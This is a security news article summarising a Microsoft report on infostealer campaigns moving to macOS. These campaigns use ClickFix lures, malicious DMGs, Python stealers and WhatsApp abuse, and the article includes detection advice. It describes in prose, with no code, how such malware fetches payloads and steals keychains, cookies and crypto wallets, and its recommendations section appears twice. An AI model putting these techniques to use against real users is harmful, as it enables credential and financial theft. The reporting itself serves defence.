Microsoft warns info-stealing attacks are expanding from Windows to macOS, using cross-platform languages like Python and abusing trusted platforms.
Microsoft warns info-stealing attacks are rapidly expanding from Windows to macOS, using cross-platform languages like Python and abusing trusted platforms.
Since late 2025, Microsoft has seen a surge in macOS infostealer attacks using social engineering, fake fixes, and malicious DMG files. Attackers deploy macOS-specific and Python-based stealers, abuse trusted apps like WhatsApp, and use native tools to steal credentials, crypto, and session data while evading defenses.
“Since late 2025, Microsoft Defender Experts has observed macOS targeted infostealer campaigns using social engineering techniques—including ClickFix-style prompts and malicious DMG installers—to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS).” reads the report published by Microsoft.
“These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, secrets from browsers, keychains, and developer environments.”
Attackers are increasingly targeting Mac users and organizations with information-stealing malware using tricks that look legitimate and familiar.
Mac users are lured to fake websites, often via Google Ads, that push fake software or ask them to paste commands into Terminal. These scams install stealers like DigitStealer, MacSync, and Atomic Stealer, which quietly grab browser passwords, crypto wallets, and developer credentials, then erase traces. This can lead to account takeovers, financial theft, and access to company systems.
At the same time, phishing emails are spreading Python-based stealers because they’re easy to build and hard to detect. Malware like PXA Stealer steals logins, financial data, and browser sessions, often using Telegram and trusted tools to hide activity.
Attackers are also abusing trusted platforms like WhatsApp and PDF tools to spread malware, turning normal apps into delivery channels for credential and crypto theft.
In November 2025, Microsoft observed a WhatsApp abuse campaign that spread Eternidade Stealer through a multi-stage, worm-like infection chain. The attack starts with an obfuscated VB script that launches PowerShell to fetch payloads. A Python component hijacks WhatsApp accounts to message all contacts with malicious files, while a malicious MSI installs Eternidade Stealer to steal banking, payment, and cryptocurrency credentials.
In September 2025, Microsoft uncovered a fake “Crystal PDF” editor spread via Google Ads and SEO poisoning. Once installed, it persists via scheduled tasks and steals browser cookies, sessions, and credentials from Chrome and Firefox.
Microsoft recommends a layered defense to stop macOS, Python-based, and platform-abuse infostealers. Train users to spot fake ads, bogus installers, and ClickFix copy-paste tricks, and avoid unsigned DMGs or “terminal fixes.” Monitor macOS for risky Terminal activity like curl, Base64 decoding, AppleScript, and fileless execution chains. Watch for unusual access to Keychain, browser credentials, cloud keys, and crypto wallets.
Inspect outbound traffic for POST requests to new or suspicious domains and for short-lived ZIP files created in temp folders before data exfiltration. Block known command-and-control servers using threat intelligence. Strengthen defenses against Python and LOLBIN abuse, including certutil misuse, AutoIt activity, and process hollowing.
Enable cloud-delivered protection, EDR in block mode, network and web protection, SmartScreen, automated investigation, and tamper protection. Apply attack surface reduction rules to block obfuscated scripts, untrusted executables, and scripts launching downloaded payloads.
Microsoft recommends a layered defense to stop macOS, Python-based, and platform-abuse infostealers. Train users to spot fake ads, bogus installers, and ClickFix copy-paste tricks, and avoid unsigned DMGs or “terminal fixes.” Monitor macOS for risky Terminal activity like curl, Base64 decoding, AppleScript, and fileless execution chains. Watch for unusual access to Keychain, browser credentials, cloud keys, and crypto wallets.
Inspect outbound traffic for POST requests to new or suspicious domains and for short-lived ZIP files created in temp folders before data exfiltration. Block known command-and-control servers using threat intelligence. Strengthen defenses against Python and LOLBIN abuse, including certutil misuse, AutoIt activity, and process hollowing.
Enable cloud-delivered protection, EDR in block mode, network and web protection, SmartScreen, automated investigation, and tamper protection. Apply attack surface reduction rules to block obfuscated scripts, untrusted executables, and scripts launching downloaded payloads.
“Due to the growing threat of Python-based infostealers, it is important that organizations protect their environment by being aware of the tactics, techniques, and procedures used by the threat actors who deploy this type of malware.” Microsoft concludes. “Being compromised by infostealers can lead to data breaches, unauthorized access to internal systems, business email compromise (BEC), supply chain attacks, and ransomware attacks.”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Info-Stealing attacks)
Source: SecurityAffairs
Source Link: https://securityaffairs.com/187608/security/microsoft-info-stealing-malware-expands-from-windows-to-macos.html